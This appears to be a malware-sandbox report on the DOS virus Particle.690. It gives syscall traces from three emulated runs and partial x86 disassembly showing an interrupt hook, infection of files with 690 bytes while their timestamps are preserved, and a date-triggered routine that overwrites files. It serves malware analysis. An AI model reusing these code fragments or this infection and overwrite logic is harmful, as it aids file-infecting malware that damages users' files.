Sample viewer

vx.netlux.org/Virus.DOS.Particle.690

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:55:05.288207948Z 44 PC: 12bcc | Get time 0x12bcc: or dx, dx
0x12bce: je 0x12bc8
0x12bd0: mov word ptr [bp + 0x13f], dx
0x12bd4: mov ax, 0xfe05
0x12bd7: jmp 0x12bd5
0x12bd9: add ax, 0x4b21
0x12bdc: int 0x21
0x12bde: mov word ptr [bp + 0x44f], bx
0x12be2: mov word ptr [bp + 0x451], es
0x12be6: mov ah, 0x25
0x12be8: lea dx, word ptr [bp + 0x3cc]
0x12bec: int 0x21
0x12bee: lea si, word ptr [bp + 0x3e3]
0x12bf2: xor dx, dx
0x12bf4: mov ah, 0x47
0x12bf6: int 0x21
0x12bf8: mov ah, 0x1a
0x12bfa: lea dx, word ptr [bp + 0x423]
0x12bfe: int 0x21
0x12c00: mov byte ptr [bp + 0x44e], 0
2018-12-17T22:55:05.289897778Z 53 PC: 12bde | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:55:05.290676058Z 37 PC: 12bee | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:55:05.291382337Z 71 PC: 12bf8 | Get current directory
2018-12-17T22:55:05.293450674Z 26 PC: 12c00 | Set disk transfer address
2018-12-17T22:55:05.302037429Z 78 PC: 12c7a | Find first file
2018-12-17T22:55:05.306013726Z 67 PC: 12c87 | Get or set file attributes
2018-12-17T22:55:05.318970608Z 61 PC: 12c8e | Open file (Filename = '��&�')
2018-12-17T22:55:05.324314097Z 63 PC: 12c9b | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:05.328391518Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.329420473Z 64 PC: 12ace | Write file or device (Write 690 bytes on handle 5)
2018-12-17T22:55:05.334811239Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.335713107Z 64 PC: 12ce9 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:05.339615309Z 87 PC: 12cf6 | Get or set file date and time
2018-12-17T22:55:05.34112849Z 67 PC: 12d0d | Get or set file attributes
2018-12-17T22:55:05.349832843Z 62 PC: 12cb4 | Close file
2018-12-17T22:55:05.356788883Z 79 PC: 12c7a | Find next file
2018-12-17T22:55:05.359985127Z 67 PC: 12c87 | Get or set file attributes
2018-12-17T22:55:05.369551339Z 61 PC: 12c8e | Open file (Filename = '��&�')
2018-12-17T22:55:05.380935676Z 63 PC: 12c9b | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:05.392510786Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.394441147Z 64 PC: 12ace | Write file or device (Write 690 bytes on handle 5)
2018-12-17T22:55:05.402744447Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.405006967Z 64 PC: 12ce9 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:05.41178288Z 87 PC: 12cf6 | Get or set file date and time
2018-12-17T22:55:05.413589733Z 67 PC: 12d0d | Get or set file attributes
2018-12-17T22:55:05.425399947Z 62 PC: 12cb4 | Close file
2018-12-17T22:55:05.433000184Z 79 PC: 12c7a | Find next file
2018-12-17T22:55:05.436579636Z 67 PC: 12c87 | Get or set file attributes
2018-12-17T22:55:05.447611668Z 61 PC: 12c8e | Open file (Filename = '��&�')
2018-12-17T22:55:05.45416599Z 63 PC: 12c9b | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:05.46115087Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.462973494Z 64 PC: 12ace | Write file or device (Write 690 bytes on handle 5)
2018-12-17T22:55:05.471342122Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.472945885Z 64 PC: 12ce9 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:05.479614646Z 87 PC: 12cf6 | Get or set file date and time
2018-12-17T22:55:05.487388435Z 67 PC: 12d0d | Get or set file attributes
2018-12-17T22:55:05.497852592Z 62 PC: 12cb4 | Close file
2018-12-17T22:55:05.504554397Z 79 PC: 12c7a | Find next file
2018-12-17T22:55:05.507740101Z 67 PC: 12c87 | Get or set file attributes
2018-12-17T22:55:05.518182727Z 61 PC: 12c8e | Open file (Filename = '��&�')
2018-12-17T22:55:05.524769356Z 63 PC: 12c9b | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:05.531631638Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.533081843Z 64 PC: 12ace | Write file or device (Write 690 bytes on handle 5)
2018-12-17T22:55:05.540695187Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.543332707Z 64 PC: 12ce9 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:05.549568612Z 87 PC: 12cf6 | Get or set file date and time
2018-12-17T22:55:05.551280327Z 67 PC: 12d0d | Get or set file attributes
2018-12-17T22:55:05.562128589Z 62 PC: 12cb4 | Close file
2018-12-17T22:55:05.568728633Z 79 PC: 12c7a | Find next file
2018-12-17T22:55:05.571811267Z 67 PC: 12c87 | Get or set file attributes
2018-12-17T22:55:05.582444696Z 61 PC: 12c8e | Open file (Filename = '��&�')
2018-12-17T22:55:05.589068579Z 63 PC: 12c9b | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:05.595409957Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.597877885Z 64 PC: 12ace | Write file or device (Write 690 bytes on handle 5)
2018-12-17T22:55:05.605941323Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.607845687Z 64 PC: 12ce9 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:05.615192469Z 87 PC: 12cf6 | Get or set file date and time
2018-12-17T22:55:05.616991064Z 67 PC: 12d0d | Get or set file attributes
2018-12-17T22:55:05.627916848Z 62 PC: 12cb4 | Close file
2018-12-17T22:55:05.636988365Z 79 PC: 12c7a | Find next file
2018-12-17T22:55:05.639997363Z 67 PC: 12c87 | Get or set file attributes
2018-12-17T22:55:05.650492007Z 61 PC: 12c8e | Open file (Filename = '��&�')
2018-12-17T22:55:05.658503341Z 63 PC: 12c9b | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:05.665036532Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.667045089Z 64 PC: 12ace | Write file or device (Write 690 bytes on handle 5)
2018-12-17T22:55:05.676935497Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.678713876Z 64 PC: 12ce9 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:05.685347434Z 87 PC: 12cf6 | Get or set file date and time
2018-12-17T22:55:05.687593175Z 67 PC: 12d0d | Get or set file attributes
2018-12-17T22:55:05.696783163Z 62 PC: 12cb4 | Close file
2018-12-17T22:55:05.701338027Z 79 PC: 12c7a | Find next file
2018-12-17T22:55:05.714074873Z 67 PC: 12c87 | Get or set file attributes
2018-12-17T22:55:05.720473941Z 61 PC: 12c8e | Open file (Filename = '��&�')
2018-12-17T22:55:05.729768949Z 63 PC: 12c9b | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:05.737036543Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.738841525Z 64 PC: 12ace | Write file or device (Write 690 bytes on handle 5)
2018-12-17T22:55:05.746887613Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.749035111Z 64 PC: 12ce9 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:05.75552579Z 87 PC: 12cf6 | Get or set file date and time
2018-12-17T22:55:05.756989969Z 67 PC: 12d0d | Get or set file attributes
2018-12-17T22:55:05.767420274Z 62 PC: 12cb4 | Close file
2018-12-17T22:55:05.774717237Z 79 PC: 12c7a | Find next file
2018-12-17T22:55:05.776605094Z 67 PC: 12c87 | Get or set file attributes
2018-12-17T22:55:05.782600319Z 61 PC: 12c8e | Open file (Filename = '��&�')
2018-12-17T22:55:05.789708585Z 63 PC: 12c9b | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:05.79392521Z 66 PC: 12d3e | Move file pointer
2018-12-17T22:55:05.795324034Z 67 PC: 12d0d | Get or set file attributes
2018-12-17T22:55:05.802335377Z 62 PC: 12cb4 | Close file
2018-12-17T22:55:05.804287842Z 79 PC: 12c7a | Find next file
2018-12-17T22:55:05.806832327Z 59 PC: 12c17 | Change current directory
2018-12-17T22:55:05.810682337Z 59 PC: 12c23 | Change current directory
2018-12-17T22:55:05.813889243Z 42 PC: 12c27 | Get date 0x12c27: cmp dl, 0xe
0x12c2a: jne 0x12c58
0x12c2c: mov ah, 0x4e
0x12c2e: lea dx, word ptr [bp + 0x3d5]
0x12c32: xor cx, cx
0x12c34: int 0x21
0x12c36: jb 0x12c58
0x12c38: mov ax, 0x3d01
0x12c3b: lea dx, word ptr [bp + 0x441]
0x12c3f: int 0x21
0x12c41: jb 0x12c54
0x12c43: mov bx, ax
0x12c45: mov ah, 0x40
0x12c47: mov cx, 0x19d
0x12c4a: lea dx, word ptr [bp + 0x15f]
0x12c4e: int 0x21
0x12c50: mov ah, 0x3e
0x12c52: int 0x21
0x12c54: mov ah, 0x4f
0x12c56: jmp 0x12c2e
2018-12-17T22:55:05.817441872Z 26 PC: 12c5f | Set disk transfer address
2018-12-17T22:55:05.818905707Z 37 PC: 12c68 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:55:05.820145698Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11770,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:20.435759963Z 44 PC: 12bcc | Get time 0x12bcc: or dx, dx
0x12bce: je 0x12bc8
0x12bd0: mov word ptr [bp + 0x13f], dx
0x12bd4: mov ax, 0xfe05
0x12bd7: jmp 0x12bd5
0x12bd9: add ax, 0x4b21
0x12bdc: int 0x21
0x12bde: mov word ptr [bp + 0x44f], bx
0x12be2: mov word ptr [bp + 0x451], es
0x12be6: mov ah, 0x25
0x12be8: lea dx, word ptr [bp + 0x3cc]
0x12bec: int 0x21
0x12bee: lea si, word ptr [bp + 0x3e3]
0x12bf2: xor dx, dx
0x12bf4: mov ah, 0x47
0x12bf6: int 0x21
0x12bf8: mov ah, 0x1a
0x12bfa: lea dx, word ptr [bp + 0x423]
0x12bfe: int 0x21
0x12c00: mov byte ptr [bp + 0x44e], 0
2018-12-25T12:31:20.440693549Z 53 PC: 12bde | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:20.445473942Z 37 PC: 12bee | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:20.446849734Z 71 PC: 12bf8 | Get current directory
2018-12-25T12:31:20.450137723Z 26 PC: 12c00 | Set disk transfer address
2018-12-25T12:31:20.452544439Z 78 PC: 12c7a | Find first file
2018-12-25T12:31:20.459847275Z 67 PC: 12c87 | Get or set file attributes
2018-12-25T12:31:20.476895787Z 61 PC: 12c8e | Open file (Filename = '��&�')
2018-12-25T12:31:20.486450088Z 63 PC: 12c9b | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:31:20.494253492Z 66 PC: 12d3e | Move file pointer
2018-12-25T12:31:20.496707707Z 64 PC: 12ace | Write file or device (Write 690 bytes on handle 5)
2018-12-25T12:31:20.50856044Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:20.510416601Z 64 PC: 12ce9 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:31:20.517862244Z 87 PC: 12cf6 | Get or set file date and time
2018-12-25T12:31:20.520457619Z 67 PC: 12d0d | Get or set file attributes
2018-12-25T12:31:20.532588672Z 62 PC: 12cb4 | Close file
2018-12-25T12:31:20.540887774Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:20.543923962Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:20.555914223Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:20.564029477Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:20.572564378Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:20.576029461Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:20.585808705Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:20.587757989Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:20.596688123Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:20.598651366Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:20.610935329Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:20.619586332Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:20.622738907Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:20.634507933Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:20.64339453Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:20.65087855Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:20.653154365Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:20.674868109Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:20.676939277Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:20.68468209Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:20.687052113Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:20.700907845Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:20.709526707Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:20.712830373Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:20.724282886Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:20.731661833Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:20.7387379Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:20.740971226Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:20.750749986Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:20.752316014Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:20.761129748Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:20.762920763Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:20.775134544Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:20.783810448Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:20.78711118Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:20.798413107Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:20.80696283Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:20.814694784Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:20.816888623Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:20.826727588Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:20.830028183Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:20.837726002Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:20.83981095Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:20.853233361Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:20.861354452Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:20.864681498Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:20.876376017Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:20.884485124Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:20.892411859Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:20.895361888Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:20.90576162Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:20.907728416Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:20.916024431Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:20.918973258Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:20.931368361Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:20.939441465Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:20.943781332Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:20.955508288Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:20.963291602Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:20.971646918Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:20.97404549Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:20.983452886Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:20.985958467Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:20.993602241Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:20.996118162Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:21.008965817Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:21.017696953Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:21.021036209Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:21.032374725Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:21.040387882Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:21.043570161Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:21.045622412Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:21.057352094Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:21.059728753Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:21.062779135Z 59 PC: 12c17 | Change current directory
2018-12-25T12:31:21.068136454Z 59 PC: 12c23 | Change current directory
2018-12-25T12:31:21.078243551Z 42 PC: 12c27 | Get date 0x12c27: cmp dl, 0xe
0x12c2a: jne 0x12c58
0x12c2c: mov ah, 0x4e
0x12c2e: lea dx, word ptr [bp + 0x3d5]
0x12c32: xor cx, cx
0x12c34: int 0x21
0x12c36: jb 0x12c58
0x12c38: mov ax, 0x3d01
0x12c3b: lea dx, word ptr [bp + 0x441]
0x12c3f: int 0x21
0x12c41: jb 0x12c54
0x12c43: mov bx, ax
0x12c45: mov ah, 0x40
0x12c47: mov cx, 0x19d
0x12c4a: lea dx, word ptr [bp + 0x15f]
0x12c4e: int 0x21
0x12c50: mov ah, 0x3e
0x12c52: int 0x21
0x12c54: mov ah, 0x4f
0x12c56: jmp 0x12c2e
2018-12-25T12:31:21.081787472Z 26 PC: 12c5f | Set disk transfer address
2018-12-25T12:31:21.083789192Z 37 PC: 12c68 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:21.085493291Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')

{"DateBased":true,"Day":14,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11770,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:22.389970642Z 44 PC: 12bcc | Get time 0x12bcc: or dx, dx
0x12bce: je 0x12bc8
0x12bd0: mov word ptr [bp + 0x13f], dx
0x12bd4: mov ax, 0xfe05
0x12bd7: jmp 0x12bd5
0x12bd9: add ax, 0x4b21
0x12bdc: int 0x21
0x12bde: mov word ptr [bp + 0x44f], bx
0x12be2: mov word ptr [bp + 0x451], es
0x12be6: mov ah, 0x25
0x12be8: lea dx, word ptr [bp + 0x3cc]
0x12bec: int 0x21
0x12bee: lea si, word ptr [bp + 0x3e3]
0x12bf2: xor dx, dx
0x12bf4: mov ah, 0x47
0x12bf6: int 0x21
0x12bf8: mov ah, 0x1a
0x12bfa: lea dx, word ptr [bp + 0x423]
0x12bfe: int 0x21
0x12c00: mov byte ptr [bp + 0x44e], 0
2018-12-25T12:31:22.392227206Z 53 PC: 12bde | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:22.393030956Z 37 PC: 12bee | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:22.393725589Z 71 PC: 12bf8 | Get current directory
2018-12-25T12:31:22.39596656Z 26 PC: 12c00 | Set disk transfer address
2018-12-25T12:31:22.397349018Z 78 PC: 12c7a | Find first file
2018-12-25T12:31:22.40263457Z 67 PC: 12c87 | Get or set file attributes
2018-12-25T12:31:22.420467183Z 61 PC: 12c8e | Open file (Filename = '��&�')
2018-12-25T12:31:22.428954033Z 63 PC: 12c9b | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:31:22.435131368Z 66 PC: 12d3e | Move file pointer
2018-12-25T12:31:22.436489646Z 64 PC: 12ace | Write file or device (Write 690 bytes on handle 5)
2018-12-25T12:31:22.445190815Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:22.446435818Z 64 PC: 12ce9 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:31:22.45262189Z 87 PC: 12cf6 | Get or set file date and time
2018-12-25T12:31:22.454862627Z 67 PC: 12d0d | Get or set file attributes
2018-12-25T12:31:22.465188732Z 62 PC: 12cb4 | Close file
2018-12-25T12:31:22.471809024Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:22.474199567Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:22.483597754Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:22.490426463Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:22.494309646Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:22.495600059Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:22.500473403Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:22.501378718Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:22.505900342Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:22.507309197Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:22.514118739Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:22.521395264Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:22.524061585Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:22.533619467Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:22.541522659Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:22.548360892Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:22.550039444Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:22.640320844Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:22.64178784Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:22.648109955Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:22.649872517Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:22.782881491Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:22.860222235Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:22.863235716Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:22.872588793Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:22.878894641Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:22.885697525Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:22.887424208Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:22.895201127Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:22.896935148Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:22.903169732Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:22.904541153Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:22.915111679Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:22.92171264Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:22.924105512Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:22.933769686Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:22.940102288Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:22.946044434Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:22.94846102Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:22.956414531Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:22.957744539Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:22.964371622Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:22.965806555Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:22.976016032Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:22.983129836Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:22.985620918Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:22.994997657Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.002024328Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.008264052Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.009814267Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:23.019276876Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.021372337Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:23.027746527Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:23.029294936Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.039903261Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:23.046583282Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.049288905Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:23.059024808Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.065305138Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.071581574Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.073441377Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:23.081598671Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.082887771Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:23.089186249Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:23.090672392Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.100989527Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:23.108636673Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.111080002Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:23.125347502Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.132231993Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.139182658Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.140935395Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.151275175Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:23.152926702Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.155592268Z 59 PC: 12c17 | Change current directory
2018-12-25T12:31:23.159893514Z 59 PC: 12c23 | Change current directory
2018-12-25T12:31:23.16359057Z 42 PC: 12c27 | Get date 0x12c27: cmp dl, 0xe
0x12c2a: jne 0x12c58
0x12c2c: mov ah, 0x4e
0x12c2e: lea dx, word ptr [bp + 0x3d5]
0x12c32: xor cx, cx
0x12c34: int 0x21
0x12c36: jb 0x12c58
0x12c38: mov ax, 0x3d01
0x12c3b: lea dx, word ptr [bp + 0x441]
0x12c3f: int 0x21
0x12c41: jb 0x12c54
0x12c43: mov bx, ax
0x12c45: mov ah, 0x40
0x12c47: mov cx, 0x19d
0x12c4a: lea dx, word ptr [bp + 0x15f]
0x12c4e: int 0x21
0x12c50: mov ah, 0x3e
0x12c52: int 0x21
0x12c54: mov ah, 0x4f
0x12c56: jmp 0x12c2e
2018-12-25T12:31:23.165604364Z 78 PC: 12c36 | Find first file
2018-12-25T12:31:23.172294771Z 61 PC: 12c41 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:23.182749617Z 64 PC: 12c50 | Write file or device (Write 413 bytes on handle 5)
2018-12-25T12:31:23.189174684Z 62 PC: 12c54 | Close file
2018-12-25T12:31:23.196986231Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:23.199502626Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:23.206347466Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:23.214173497Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:23.222199651Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:23.225059053Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:23.232422963Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:23.239238396Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:23.246957026Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:23.250287803Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:23.257011024Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:23.263383892Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:23.271738374Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:23.274278409Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:23.280367258Z 64 PC: 12c50 | Write file or device (See above)
